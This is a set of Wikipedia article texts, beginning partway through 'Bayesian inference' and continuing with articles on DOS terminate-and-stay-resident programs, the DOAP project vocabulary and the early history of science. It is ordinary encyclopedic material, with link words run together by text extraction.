Both types of predictive distributions have the form of acompound probability distribution(as does themarginal likelihood). In fact, if the prior distribution is aconjugate prior, such that the prior and posterior distributions come from the same family, it can be seen that both prior and posterior predictive distributions also come from the same family of compound distributions. The only difference is that the posterior predictive distribution uses the updated values of the hyperparameters (applying the Bayesian update rules given in theconjugate priorarticle), while the prior predictive distribution uses the values of the hyperparameters that appear in the prior distribution.
P(E∣M)P(E)>1⇒P(E∣M)>P(E){\textstyle {\frac {P(E\mid M)}{P(E)}}>1\Rightarrow P(E\mid M)>P(E)}. That is, if the model were true, the evidence would be more likely than is predicted by the current state of belief. The reverse applies for a decrease in belief. If the belief does not change,P(E∣M)P(E)=1⇒P(E∣M)=P(E){\textstyle {\frac {P(E\mid M)}{P(E)}}=1\Rightarrow P(E\mid M)=P(E)}. That is, the evidence is independent of the model. If the model were true, the evidence would be exactly as likely as predicted by the current state of belief.
IfP(M)=0{\displaystyle P(M)=0}thenP(M∣E)=0{\displaystyle P(M\mid E)=0}. IfP(M)=1{\displaystyle P(M)=1}andP(E)>0{\displaystyle P(E)>0}, thenP(M|E)=1{\displaystyle P(M|E)=1}. This can be interpreted to mean that hard convictions are insensitive to counter-evidence.
The former follows directly from Bayes' theorem. The latter can be derived by applying the first rule to the event "notM{\displaystyle M}" in place of "M{\displaystyle M}", yielding "if1−P(M)=0{\displaystyle 1-P(M)=0}, then1−P(M∣E)=0{\displaystyle 1-P(M\mid E)=0}", from which the result immediately follows.
Consider the behaviour of a belief distribution as it is updated a large number of times withindependent and identically distributedtrials. For sufficiently nice prior probabilities, theBernstein-von Mises theoremgives that in the limit of infinite trials, the posterior converges to aGaussian distributionindependent of the initial prior under some conditions firstly outlined and rigorously proven byJoseph L. Doobin 1948, namely if the random variable in consideration has a finiteprobability space. The more general results were obtained later by the statisticianDavid A. Freedmanwho published in two seminal research papers in 1963[12]and 1965[13]when and under what circumstances the asymptotic behaviour of posterior is guaranteed. His 1963 paper treats, like Doob (1949), the finite case and comes to a satisfactory conclusion. However, if the random variable has an infinite but countableprobability space(i.e., corresponding to a die with infinite many faces) the 1965 paper demonstrates that for a dense subset of priors theBernstein-von Mises theoremis not applicable. In this case there isalmost surelyno asymptotic convergence. Later in the 1980s and 1990sFreedmanandPersi Diaconiscontinued to work on the case of infinite countable probability spaces.[14]To summarise, there may be insufficient trials to suppress the effects of the initial choice, and especially for large (but finite) systems the convergence might be very slow.
In parameterized form, the prior distribution is often assumed to come from a family of distributions calledconjugate priors. The usefulness of a conjugate prior is that the corresponding posterior distribution will be in the same family, and the calculation may be expressed inclosed form.
It is often desired to use a posterior distribution to estimate a parameter or variable. Several methods of Bayesian estimation selectmeasurements of central tendencyfrom the posterior distribution.
For one-dimensional problems, a unique median exists for practical continuous problems. The posterior median is attractive as arobust estimator.[15]
If there exists a finite mean for the posterior distribution, then the posterior mean is a method of estimation.[16]θ~=E[θ]=∫θp(θ∣X,α)dθ{\displaystyle {\tilde {\theta }}=\operatorname {E} [\theta ]=\int \theta \,p(\theta \mid \mathbf {X} ,\alpha )\,d\theta }
Taking a value with the greatest probability definesmaximuma posteriori(MAP)estimates:[17]{θMAP}⊂argmaxθp(θ∣X,α).{\displaystyle \{\theta _{\text{MAP}}\}\subset \arg \max _{\theta }p(\theta \mid \mathbf {X} ,\alpha ).}
There are examples where no maximum is attained, in which case the set of MAP estimates isempty.
There are other methods of estimation that minimize the posteriorrisk(expected-posterior loss) with respect to aloss function, and these are of interest tostatistical decision theoryusing the sampling distribution ("frequentist statistics").[18]
Theposterior predictive distributionof a new observationx~{\displaystyle {\tilde {x}}}(that is independent of previous observations) is determined by[19]p(x~|X,α)=∫p(x~,θ∣X,α)dθ=∫p(x~∣θ)p(θ∣X,α)dθ.{\displaystyle p({\tilde {x}}|\mathbf {X} ,\alpha )=\int p({\tilde {x}},\theta \mid \mathbf {X} ,\alpha )\,d\theta =\int p({\tilde {x}}\mid \theta )p(\theta \mid \mathbf {X} ,\alpha )\,d\theta .}
Suppose there are two full bowls of cookies. Bowl #1 has 10 chocolate chip and 30 plain cookies, while bowl #2 has 20 of each. Our friend Fred picks a bowl at random, and then picks a cookie at random. We may assume there is no reason to believe Fred treats one bowl differently from another, likewise for the cookies. The cookie turns out to be a plain one. How probable is it that Fred picked it out of bowl #1?
Intuitively, it seems clear that the answer should be more than a half, since there are more plain cookies in bowl #1. The precise answer is given by Bayes' theorem. LetH1{\displaystyle H_{1}}correspond to bowl #1, andH2{\displaystyle H_{2}}to bowl #2.
It is given that the bowls are identical from Fred's point of view, thusP(H1)=P(H2){\displaystyle P(H_{1})=P(H_{2})}, and the two must add up to 1, so both are equal to 0.5.
The eventE{\displaystyle E}is the observation of a plain cookie. From the contents of the bowls, we know thatP(E∣H1)=30/40=0.75{\displaystyle P(E\mid H_{1})=30/40=0.75}andP(E∣H2)=20/40=0.5.{\displaystyle P(E\mid H_{2})=20/40=0.5.}Bayes' formula then yieldsP(H1∣E)=P(E∣H1)P(H1)P(E∣H1)P(H1)+P(E∣H2)P(H2)=0.75×0.50.75×0.5+0.5×0.5=0.6{\displaystyle {\begin{aligned}P(H_{1}\mid E)&={\frac {P(E\mid H_{1})\,P(H_{1})}{P(E\mid H_{1})\,P(H_{1})\;+\;P(E\mid H_{2})\,P(H_{2})}}\\\\\ &={\frac {0.75\times 0.5}{0.75\times 0.5+0.5\times 0.5}}\\\\\ &=0.6\end{aligned}}}
Before we observed the cookie, the probability we assigned for Fred having chosen bowl #1 was the prior probability,P(H1){\displaystyle P(H_{1})}, which was 0.5. After observing the cookie, we must revise the probability toP(H1∣E){\displaystyle P(H_{1}\mid E)}, which is 0.6.
An archaeologist is working at a site thought to be from the medieval period, between the 11th century to the 16th century. However, it is uncertain exactly when in this period the site was inhabited. Fragments of pottery are found, some of which are glazed and some of which are decorated. It is expected that if the site were inhabited during the early medieval period, then 1% of the pottery would be glazed and 50% of its area decorated, whereas if it had been inhabited in the late medieval period then 81% would be glazed and 5% of its area decorated. How confident can the archaeologist be in the date of inhabitation as fragments are unearthed?
The degree of belief in the continuous variableC{\displaystyle C}(century) is to be calculated, with the discrete set of events{GD,GD¯,G¯D,G¯D¯}{\displaystyle \{GD,G{\bar {D}},{\bar {G}}D,{\bar {G}}{\bar {D}}\}}as evidence. Assuming linear variation of glaze and decoration with time, and that these variables are independent,
P(E=GD∣C=c)=(0.01+0.81−0.0116−11(c−11))(0.5−0.5−0.0516−11(c−11)){\displaystyle P(E=GD\mid C=c)=(0.01+{\frac {0.81-0.01}{16-11}}(c-11))(0.5-{\frac {0.5-0.05}{16-11}}(c-11))}P(E=GD¯∣C=c)=(0.01+0.81−0.0116−11(c−11))(0.5+0.5−0.0516−11(c−11)){\displaystyle P(E=G{\bar {D}}\mid C=c)=(0.01+{\frac {0.81-0.01}{16-11}}(c-11))(0.5+{\frac {0.5-0.05}{16-11}}(c-11))}P(E=G¯D∣C=c)=((1−0.01)−0.81−0.0116−11(c−11))(0.5−0.5−0.0516−11(c−11)){\displaystyle P(E={\bar {G}}D\mid C=c)=((1-0.01)-{\frac {0.81-0.01}{16-11}}(c-11))(0.5-{\frac {0.5-0.05}{16-11}}(c-11))}P(E=G¯D¯∣C=c)=((1−0.01)−0.81−0.0116−11(c−11))(0.5+0.5−0.0516−11(c−11)){\displaystyle P(E={\bar {G}}{\bar {D}}\mid C=c)=((1-0.01)-{\frac {0.81-0.01}{16-11}}(c-11))(0.5+{\frac {0.5-0.05}{16-11}}(c-11))}
Assume a uniform prior offC(c)=0.2{\textstyle f_{C}(c)=0.2}, and that trials areindependent and identically distributed. When a new fragment of typee{\displaystyle e}is discovered, Bayes' theorem is applied to update the degree of belief for eachc{\displaystyle c}:fC(c∣E=e)=P(E=e∣C=c)P(E=e)fC(c)=P(E=e∣C=c)∫1116P(E=e∣C=c)fC(c)dcfC(c){\displaystyle f_{C}(c\mid E=e)={\frac {P(E=e\mid C=c)}{P(E=e)}}f_{C}(c)={\frac {P(E=e\mid C=c)}{\int _{11}^{16}{P(E=e\mid C=c)f_{C}(c)dc}}}f_{C}(c)}
A computer simulation of the changing belief as 50 fragments are unearthed is shown on the graph. In the simulation, the site was inhabited around 1420, orc=15.2{\displaystyle c=15.2}. By calculating the area under the relevant portion of the graph for 50 trials, the archaeologist can say that there is practically no chance the site was inhabited in the 11th and 12th centuries, about 1% chance that it was inhabited during the 13th century, 63% chance during the 14th century and 36% during the 15th century. TheBernstein-von Mises theoremasserts here the asymptotic convergence to the "true" distribution because theprobability spacecorresponding to the discrete set of events{GD,GD¯,G¯D,G¯D¯}{\displaystyle \{GD,G{\bar {D}},{\bar {G}}D,{\bar {G}}{\bar {D}}\}}is finite (see above section on asymptotic behaviour of the posterior).
Adecision-theoreticjustification of the use of Bayesian inference was given byAbraham Wald, who proved that every unique Bayesian procedure isadmissible. Conversely, everyadmissiblestatistical procedure is either a Bayesian procedure or a limit of Bayesian procedures.[20]
Wald characterized admissible procedures as Bayesian procedures (and limits of Bayesian procedures), making the Bayesian formalism a central technique in such areas offrequentist inferenceasparameter estimation,hypothesis testing, and computingconfidence intervals.[21][22][23]For example:
Bayesian methodology also plays a role inmodel selectionwhere the aim is to select one model from a set of competing models that represents most closely the underlying process that generated the observed data. In Bayesian model comparison, the model with the highestposterior probabilitygiven the data is selected. The posterior probability of a model depends on the evidence, ormarginal likelihood, which reflects the probability that the data is generated by the model, and on theprior beliefof the model. When two competing models are a priori considered to be equiprobable, the ratio of their posterior probabilities corresponds to theBayes factor. Since Bayesian model comparison is aimed on selecting the model with the highest posterior probability, this methodology is also referred to as the maximum a posteriori (MAP) selection rule[28]or the MAP probability rule.[29]
While conceptually simple, Bayesian methods can be mathematically and numerically challenging. Probabilistic programming languages (PPLs) implement functions to easily build Bayesian models together with efficient automatic inference methods. This helps separate the model building from the inference, allowing practitioners to focus on their specific problems and leaving PPLs to handle the computational details for them.[30][31][32]
See the separate Wikipedia entry onBayesian statistics, specifically thestatistical modelingsection in that page.
Bayesian inference has applications inartificial intelligenceandexpert systems. Bayesian inference techniques have been a fundamental part of computerizedpattern recognitiontechniques since the late 1950s.[33]There is also an ever-growing connection between Bayesian methods and simulation-basedMonte Carlotechniques since complex models cannot be processed in closed form by a Bayesian analysis, while agraphical modelstructuremayallow for efficient simulation algorithms like theGibbs samplingand otherMetropolis–Hastings algorithmschemes.[34]Recently[when?]Bayesian inference has gained popularity among thephylogeneticscommunity for these reasons; a number of applications allow many demographic and evolutionary parameters to be estimated simultaneously.
As applied tostatistical classification, Bayesian inference has been used to develop algorithms for identifyinge-mail spam. Applications which make use of Bayesian inference for spam filtering includeCRM114,DSPAM,Bogofilter,SpamAssassin,SpamBayes,Mozilla, XEAMS, and others. Spam classification is treated in more detail in the article on thenaïve Bayes classifier.
Solomonoff's Inductive inferenceis the theory of prediction based on observations; for example, predicting the next symbol based upon a given series of symbols. The only assumption is that the environment follows some unknown but computableprobability distribution. It is a formal inductive framework that combines two well-studied principles of inductive inference: Bayesian statistics andOccam's Razor.[35][unreliable source?]Solomonoff's universal prior probability of any prefixpof a computable sequencexis the sum of the probabilities of all programs (for a universal computer) that compute something starting withp. Given somepand any computable but unknown probability distribution from whichxis sampled, the universal prior and Bayes' theorem can be used to predict the yet unseen parts ofxin optimal fashion.[36][37]
Bayesian inference has been applied in differentBioinformaticsapplications, including differential gene expression analysis.[38]Bayesian inference is also used in a general cancer risk model, calledCIRI(Continuous Individualized Risk Index), where serial measurements are incorporated to update a Bayesian model which is primarily built from prior knowledge.[39][40]
Bayesian inference can be used by jurors to coherently accumulate the evidence for and against a defendant, and to see whether, in totality, it meets their personal threshold for "beyond a reasonable doubt".[41][42][43]Bayes' theorem is applied successively to all evidence presented, with the posterior from one stage becoming the prior for the next. The benefit of a Bayesian approach is that it gives the juror an unbiased, rational mechanism for combining evidence. It may be appropriate to explain Bayes' theorem to jurors inodds form, asbetting oddsare more widely understood than probabilities. Alternatively, alogarithmic approach, replacing multiplication with addition, might be easier for a jury to handle.
If the existence of the crime is not in doubt, only the identity of the culprit, it has been suggested that the prior should be uniform over the qualifying population.[44]For example, if 1,000 people could have committed the crime, the prior probability of guilt would be 1/1000.
The use of Bayes' theorem by jurors is controversial. In the United Kingdom, a defenceexpert witnessexplained Bayes' theorem to the jury inR v Adams. The jury convicted, but the case went to appeal on the basis that no means of accumulating evidence had been provided for jurors who did not wish to use Bayes' theorem. The Court of Appeal upheld the conviction, but it also gave the opinion that "To introduce Bayes' Theorem, or any similar method, into a criminal trial plunges the jury into inappropriate and unnecessary realms of theory and complexity, deflecting them from their proper task."
Gardner-Medwin[45]argues that the criterion on which a verdict in a criminal trial should be based isnotthe probability of guilt, but rather theprobability of the evidence, given that the defendant is innocent(akin to afrequentistp-value). He argues that if the posterior probability of guilt is to be computed by Bayes' theorem, the prior probability of guilt must be known. This will depend on the incidence of the crime, which is an unusual piece of evidence to consider in a criminal trial. Consider the following three propositions:
Gardner-Medwin argues that the jury should believe bothAand not-Bin order to convict.Aand not-Bimplies the truth ofC, but the reverse is not true. It is possible thatBandCare both true, but in this case he argues that a jury should acquit, even though they know that they will be letting some guilty people go free. See alsoLindley's paradox.
Bayesian epistemologyis a movement that advocates for Bayesian inference as a means of justifying the rules of inductive logic.
Karl PopperandDavid Millerhave rejected the idea of Bayesian rationalism, i.e. using Bayes rule to make epistemological inferences:[46]It is prone to the samevicious circleas any otherjustificationistepistemology, because it presupposes what it attempts to justify. According to this view, a rational interpretation of Bayesian inference would see it merely as a probabilistic version offalsification, rejecting the belief, commonly held by Bayesians, that high likelihood achieved by a series of Bayesian updates would prove the hypothesis beyond any reasonable doubt, or even with likelihood greater than 0.
The problem considered by Bayes in Proposition 9 of his essay, "An Essay Towards Solving a Problem in the Doctrine of Chances", is the posterior distribution for the parametera(the success rate) of thebinomial distribution.[citation needed]
The termBayesianrefers toThomas Bayes(1701–1761), who proved that probabilistic limits could be placed on an unknown event.[citation needed]However, it wasPierre-Simon Laplace(1749–1827) who introduced (as Principle VI) what is now calledBayes' theoremand used it to address problems incelestial mechanics, medical statistics,reliability, andjurisprudence.[54]Early Bayesian inference, which used uniform priors following Laplace'sprinciple of insufficient reason, was called "inverse probability" (because itinfersbackwards from observations to parameters, or from effects to causes[55]). After the 1920s, "inverse probability" was largely supplanted by a collection of methods that came to be calledfrequentist statistics.[55]
In the 20th century, the ideas of Laplace were further developed in two different directions, giving rise toobjectiveandsubjectivecurrents in Bayesian practice. In the objective or "non-informative" current, the statistical analysis depends on only the model assumed, the data analyzed,[56]and the method assigning the prior, which differs from one objective Bayesian practitioner to another. In the subjective or "informative" current, the specification of the prior depends on the belief (that is, propositions on which the analysis is prepared to act), which can summarize information from experts, previous studies, etc.
In the 1980s, there was a dramatic growth in research and applications of Bayesian methods, mostly attributed to the discovery ofMarkov chain Monte Carlomethods, which removed many of the computational problems, and an increasing interest in nonstandard, complex applications.[57]Despite growth of Bayesian research, most undergraduate teaching is still based on frequentist statistics.[58]Nonetheless, Bayesian methods are widely accepted and used, such as for example in the field ofmachine learning.[59]
The following books are listed in ascending order of probabilistic sophistication:
|
https://en.wikipedia.org/wiki/Bayesian_inference
|
Aterminate-and-stay-resident program(commonlyTSR) is acomputer programrunning underDOSthat uses asystem callto return control to DOS as though it has finished, but remains incomputer memoryso it can be reactivated later.[1]This technique partially overcame DOS's limitation of executing only one program, ortask, at a time. TSRs are used only in DOS, not inWindows.
Some TSRs areutility softwarethat a computer user might call up several times a day, while working in another program, by using ahotkey.Borland Sidekickwas an early and popular example of this type. Others serve asdevice driversforhardwarethat the operating system does not directly support.
NormallyDOScan run only one program at a time. When a program finishes, it returns control to DOS using thesystem callINT 21h/4Chof theDOS API.[2]The memory and system resources used are then marked as unused. This makes it impossible to restart parts of the program without having to reload it all. However, if a program ends with the system callINT 27horINT 21h/31h, the operating system does not reuse a certain specified part of its memory.
The original call,INT 27h, is called "terminate but stay resident", hence the name "TSR". Using this call, a program can make up to 64 KB of its memory resident. MS-DOS version 2.0 introduced an improved call,INT 21h/31h('Keep Process'), which removed this limitation and let the program return anexit code. Before making this call, the program can install one or severalinterrupthandlers pointing into itself, so that it can be called again. Installing a hardware interrupt vector allows such a program to react to hardware events. Installing a software interrupt vector allows it to be called by the currently running program. Installing a timer interrupt handler allows a TSR to run periodically (using aprogrammable interval timer).
The typical method of using an interrupt vector involves reading its present value (the address), storing it within the memory space of the TSR, and replacing it with an address in its own code. The stored address is called from the TSR, in effect forming a singly linked list ofinterrupt handlers, also calledinterrupt service routines, or ISRs. This procedure of installing ISRs is calledchainingorhookingan interrupt or an interrupt vector.
TSRs can be loaded at any time; either during the DOS startup sequence (for example, fromAUTOEXEC.BAT), or at the user's request (for example,Borland'sSidekickand Turbo Debugger, Quicken's QuickPay, or FunStuff Software's Personal Calendar). Parts of DOS itself use this technique, especially in DOS versions 5.0 and later. For example, theDOSKEYcommand-line editor and various other utilities are installed by running them at the command line (manually, or fromAUTOEXEC.BATor throughINSTALLfrom within CONFIG.SYS) rather than loading them as device drivers throughDEVICEstatements in CONFIG.SYS.
Some TSRs have no way to unload themselves, so they will remain in memory until a reboot. However unloading is possible externally, using utilities like theMARK.EXE/RELEASE.EXEcombo byTurboPower Softwareorsoft rebootTSRs which will catch a specific key combination and release all TSRs loaded after them. As the chain of ISRs is singly linked, and a TSR may store the link to its predecessor anywhere it chooses, there is no general way for a TSR to remove itself from the chain. So usually a stub must be left in memory when unloading a TSR, causing memory fragmentation. This problem gave rise to TSR cooperation frameworks such asTesSeRactand AMIS.[3]
To manage problems with many TSRs sharing the same interrupt, a method called Alternate Multiplex Interrupt Specification (AMIS) was proposed byRalf D. Brownas an improvement over previously used services offered via INT 2Fh. AMIS provides ways to sharesoftware interruptsin a controlled manner. It is modeled after IBM's Interrupt Sharing Protocol, originally invented for sharing hardware interrupts of an x86 processor. AMIS services are available via Int 2Dh.[4]
The proposal never gained a widespread traction among programmers in its days. It existed alongside several other competing specifications of varying sophistication.[5]
While very useful, or even essential to overcomeDOS's limitations, TSRs have a reputation as troublemakers. Many hijack the operating system in varying documented or undocumented ways, often causing systems to crash on their activation or deactivation when used with particular applications or other TSRs.
By chaining the interrupt vectors TSRs can take complete control of the computer. A TSR can have one of two behaviors:
The terminate-and-stay-resident method is used by most DOSvirusesand other malware, which can either take control of the PC or stay in the background. This malware can react to disk I/O or execution events by infectingexecutable(.EXE or .COM) files when it is run and data files when they are opened.
Additionally, in DOS all programs must be loaded into the first 640KBof RAM (theconventional memory), even on computers with large amounts of physicalRAM. TSRs are no exception, and take chunks from that 640 KB that are thus unavailable to other applications. This meant that writing a TSR was a challenge of achieving the smallest possible size for it, and checking it for compatibility with a lot of software products from different vendors—often a very frustrating task.
In the late 1980s and early 1990s, manyvideo gameson the PC platform pushed up against this limit and left less and less space for TSRs—even essential ones likeCD-ROMdrivers—and arranging things so that there was enough free RAM to run the games, while keeping the necessary TSRs present, became very complicated. Many gamers had severalboot diskswith different configurations for different games. In later versions of MS-DOS, "boot menu" scripts allowed various configurations to be selectable via a single menu entry. In the mid- to later 1990s, while many games were still written for DOS, the 640 KB limit was eventually overcome by putting parts of the game's data above the first 1 MB of memory and using the code below 640 KB to access the extended memory usingexpanded memory(EMS) by making use ofoverlaytechnique. An alternative later approach was to switch the CPU into Protected Mode by usingDOS extendersand run the program in protected mode. The latter allowed to have code and data in the extended memory area.[citation needed]
Because programming with many overlays is a challenge in and of itself, once the program was too big to fit entirely into about 512 KB, use of extended memory was almost always done using a third-party DOS extender implementingVCPIorDPMI, because it becomes much easier and faster to access memory above the 1 MB boundary, and possible to run code in that area, when the x86 processor is switched fromreal modetoprotected mode. However, since DOS and most DOS programs run in real mode (VCPI or DPMI makes a protected-mode program look like a real-mode program to DOS and the rest of the system by switching back and forth between the two modes), DOS TSRs and device drivers also run in real mode, and so any time one gets control, the DOS extender has to switch back to real mode until it relinquishes control, incurring a time penalty (unless they utilize techniques such asDPMSorCLOAKING).
With the arrival ofexpanded memoryboards and especially ofIntel 80386processors in the second half of the 1980s, it became possible to use memory above 640 KB to load TSRs. This required complex software solutions, namedexpanded memory managers. Some memory managers areQRAMandQEMMbyQuarterdeck,386MAXbyQualitas,CEMMbyCompaq, and laterEMM386byMicrosoft. The memory areas usable for loading TSRs above 640 KB are called "upper memory blocks" (UMBs) and loading programs into them is calledloading high. Later, memory managers started including programs such as Quarterdeck's Optimize or Microsoft'sMEMMAKERwhich try to maximize the available space in the first 640 KB by determining how best to allocate TSRs between low and high memory.
With the development of games usingDOS extenders(an early example wasDoom) which bypassed the 640 KB barrier, many of the issues relating to TSRs disappeared, and with the widespread adoption ofMicrosoft Windowsand especiallyWindows 95(followed byWindows 98) – which rendered most TSRs unnecessary and some TSRs incompatible – the TSR faded into obsolescence, thoughWin16applications can do TSR-like tricks such as patching theinterrupt descriptor table(IDT) because Windows allowed it.Windows Medoes not allow a computer to boot into a DOS Kernel by shutting down Windows Me; thus TSRs became useless on Windows Me.
TheWindows NTseries (includingWindows 2000,Windows XP, and later) replaced DOS completely and run inprotected modeorlong mode(later 64-bit versions only) all the time, disabling the ability to switch to real mode, which is needed for TSRs to function. Instead these operating systems have modern driver andserviceframeworks withmemory protectionandpreemptive multitasking, allowing multiple programs and device drivers to run simultaneously without the need for special programming tricks; thekerneland its modules have been made exclusively responsible for modifying the interrupt table.
|
https://en.wikipedia.org/wiki/Terminate-and-stay-resident_program
|
DOAP(Description Of A Project) is anRDF SchemaandXMLvocabulary to describe software projects, in particularfree and open source software.
It was created and initially developed by Edd Wilder-James (Edd Dumbill) to convey semantic information associated with open source software projects.[1][2]
There are currently generators,validators, viewers, and converters to enable more projects to be able to be included in thesemantic web. In 2007Freecodelisted 43 000 projects as published with DOAP.[3]It was used in thePython Package Indexbut is no longer supported there.
In 2025, it is normal practice for DOAP files to be included withGNOMEsource code.[4]
Major properties include:homepage,developer,programming-language,os.
The following is an example in RDF/XML:
Other properties includeImplements specification,anonymous root,platform,browse,mailing list,category,description,helper,tester,short description,audience,screenshots,translator,module,documenter,wiki,repository,name,repository location,language,service endpoint,created,download mirror,vendor,old homepage,revision,download page,license,bug database,maintainer,blog,file-releaseandrelease.[5]
|
https://en.wikipedia.org/wiki/DOAP
|
Thehistory of sciencecovers the development ofsciencefromancient timesto thepresent. It encompasses all three majorbranches of science:natural,social, andformal.[1]Protoscience,early sciences, and natural philosophies such asalchemyandastrologythat existed during theBronze Age,Iron Age,classical antiquityand theMiddle Ages, declined during theearly modern periodafter the establishment of formal disciplines ofscience in the Age of Enlightenment.
The earliest roots of scientific thinking and practice can be traced toAncient EgyptandMesopotamiaduring the 3rd and 2nd millennia BCE.[2][3]These civilizations' contributions tomathematics,astronomy, andmedicineinfluenced later Greeknatural philosophyofclassical antiquity, wherein formal attempts were made to provide explanations of events in thephysical worldbased on natural causes.[2][3]After thefall of the Western Roman Empire, knowledge ofGreek conceptions of the worlddeteriorated in Latin-speakingWestern Europeduring the early centuries (400 to 1000 CE) ofthe Middle Ages,[4]but continued to thrive in theGreek-speakingByzantine Empire. Aided by translations of Greek texts, theHellenisticworldview was preserved and absorbed into theArabic-speakingMuslim worldduring theIslamic Golden Age.[5]The recovery and assimilation ofGreek worksandIslamic inquiriesinto Western Europe from the 10th to 13th century revived the learning of natural philosophy in the West.[4][6]Traditions of early science were also developed inancient Indiaand separately inancient China, theChinese modelhaving influencedVietnam,KoreaandJapanbeforeWestern exploration.[7]Among thePre-Columbianpeoples ofMesoamerica, theZapotec civilizationestablished their first known traditions of astronomy and mathematics forproducing calendars, followed by other civilizations such as theMaya.
Natural philosophy was transformed by theScientific Revolutionthat transpired during the 16th and 17th centuries in Europe,[8][9][10]asnew ideas and discoveriesdeparted fromprevious Greek conceptionsand traditions.[11][12][13][14]The New Science that emerged was moremechanisticin its worldview, more integrated with mathematics, and more reliable and open as its knowledge was based on a newly definedscientific method.[12][15][16]More "revolutions" in subsequent centuries soon followed. Thechemical revolutionof the 18th century, for instance, introduced new quantitative methods and measurements forchemistry.[17]In the19th century, new perspectives regarding theconservation of energy,age of Earth, andevolutioncame into focus.[18][19][20][21][22][23]And in the 20th century, new discoveries ingeneticsandphysicslaid the foundations for new sub disciplines such asmolecular biologyandparticle physics.[24][25]Moreover, industrial and military concerns as well as the increasing complexity of new research endeavors ushered in the era of "big science," particularly afterWorld War II.[24][25][26]
The nature of the history of science is a topic of debate (as is, by implication, the definition of science itself). The history of science is often seen as a linear story of progress,[27]but historians have come to see the story as more complex.[28][29][30]Alfred Edward Taylorhas characterised lean periods in the advance of scientific discovery as "periodical bankruptcies of science".[31]
Science is a human activity, and scientific contributions have come from people from a wide range of different backgrounds and cultures. Historians of science increasingly see their field as part of a global history of exchange, conflict and collaboration.[32]
Therelationship between science and religionhas been variously characterized in terms of "conflict", "harmony", "complexity", and "mutual independence", among others. Events in Europe such as theGalileo affairof the early 17th century – associated with the scientific revolution and theAge of Enlightenment– led scholars such asJohn William Draperto postulate (c.1874) aconflict thesis, suggesting that religion and science have been in conflict methodologically, factually and politically throughout history. The "conflict thesis" has since lost favor among the majority of contemporary scientists and historians of science.[33][34][35]However, some contemporary philosophers and scientists, such asRichard Dawkins,[36]still subscribe to this thesis.
Historians have emphasized[37]that trust is necessary for agreement on claims about nature. In this light, the 1660 establishment of theRoyal Societyand its code of experiment – trustworthy because witnessed by its members – has become animportant chapterin thehistoriographyof science.[38]Many people in modern history (typicallywomenand persons of color) were excluded from elite scientific communities andcharacterized by the science establishment as inferior. Historians in the 1980s and 1990s described the structural barriers to participation and began to recover the contributions of overlooked individuals.[39][40]Historians have also investigated the mundane practices of science such as fieldwork and specimen collection,[41]correspondence,[42]drawing,[43]record-keeping,[44]and the use of laboratory and field equipment.[45]
Inprehistorictimes, knowledge and technique were passed from generation to generation in anoral tradition. For instance, the domestication ofmaizefor agriculture has been dated to about 9,000 years ago in southernMexico, before the development ofwriting systems.[46][47][48]Similarly,archaeologicalevidence indicates the development ofastronomicalknowledge in preliterate societies.[49][50]
The oral tradition of preliterate societies had several features, the first of which was its fluidity.[2]New information was constantly absorbed and adjusted to new circumstances or community needs. There were no archives or reports. This fluidity was closely related to the practical need to explain and justify a present state of affairs.[2]Another feature was the tendency to describe the universe as just sky and earth, with a potentialunderworld. They were also prone to identify causes with beginnings, thereby providing a historical origin with an explanation. There was also a reliance on a "medicine man" or "wise woman" for healing, knowledge of divine or demonic causes of diseases, and in more extreme cases, for rituals such asexorcism,divination, songs, andincantations.[2]Finally, there was an inclination to unquestioningly accept explanations that might be deemed implausible in more modern times while at the same time not being aware that such credulous behaviors could have posed problems.[2]
The development of writing enabled humans to store and communicate knowledge across generations with much greater accuracy. Its invention was a prerequisite for the development of philosophy and laterscience in ancient times.[2]Moreover, the extent to which philosophy and science would flourish in ancient times depended on the efficiency of a writing system (e.g., use of alphabets).[2]
The earliest roots of science can be traced to theAncient Near Eastc.3000–1200 BCE– in particular toAncient EgyptandMesopotamia.[2]
Startingc.3000 BCE, the ancient Egyptians developed a numbering system that was decimal in character and had oriented their knowledge of geometry to solving practical problems such as those of surveyors and builders.[2]Their development ofgeometrywas itself a necessary development ofsurveyingto preserve the layout and ownership of farmland, which was flooded annually by theNile. The 3-4-5right triangleand other rules of geometry were used to build rectilinear structures, and the post and lintel architecture of Egypt.
Egypt was also a center ofalchemyresearch for much of theMediterranean. According to themedical papyri(writtenc.2500–1200 BCE), the ancient Egyptians believed that disease was mainly caused by the invasion of bodies by evil forces or spirits.[2]Thus, in addition tomedicine, therapies included prayer,incantation, and ritual.[2]TheEbers Papyrus, writtenc.1600 BCE, contains medical recipes for treating diseases related to the eyes, mouth, skin, internal organs, and extremities, as well as abscesses, wounds, burns, ulcers, swollen glands, tumors, headaches, and bad breath. TheEdwin Smith Papyrus, written at about the same time, contains a surgical manual for treating wounds, fractures, and dislocations. The Egyptians believed that the effectiveness of their medicines depended on the preparation and administration under appropriate rituals.[2]Medical historians believe that ancient Egyptian pharmacology, for example, was largely ineffective.[51]Both the Ebers and Edwin Smith papyri applied the following components to the treatment of disease: examination, diagnosis, treatment, and prognosis,[52]which display strong parallels to the basicempirical methodof science and, according to G. E. R. Lloyd,[53]played a significant role in the development of this methodology.
The ancient Egyptians even developed an official calendar that contained twelve months, thirty days each, and five days at the end of the year.[2]Unlike the Babylonian calendar or the ones used in Greek city-states at the time, the official Egyptian calendar was much simpler as it was fixed and did not takelunarand solar cycles into consideration.[2]
The ancient Mesopotamians had extensive knowledge about thechemical propertiesof clay, sand, metal ore,bitumen, stone, and other natural materials, and applied this knowledge to practical use in manufacturingpottery,faience, glass, soap, metals,lime plaster, and waterproofing.Metallurgyrequired knowledge about the properties of metals. Nonetheless, the Mesopotamians seem to have had little interest in gathering information about the natural world for the mere sake of gathering information and were far more interested in studying the manner in which the gods had ordered theuniverse. Biology of non-human organisms was generally only written about in the context of mainstream academic disciplines.Animal physiologywas studied extensively for the purpose ofdivination; the anatomy of theliver, which was seen as an important organ inharuspicy, was studied in particularly intensive detail.Animal behaviorwas also studied for divinatory purposes. Most information about the training and domestication of animals was probably transmitted orally without being written down, but one text dealing with the training of horses has survived.[54]
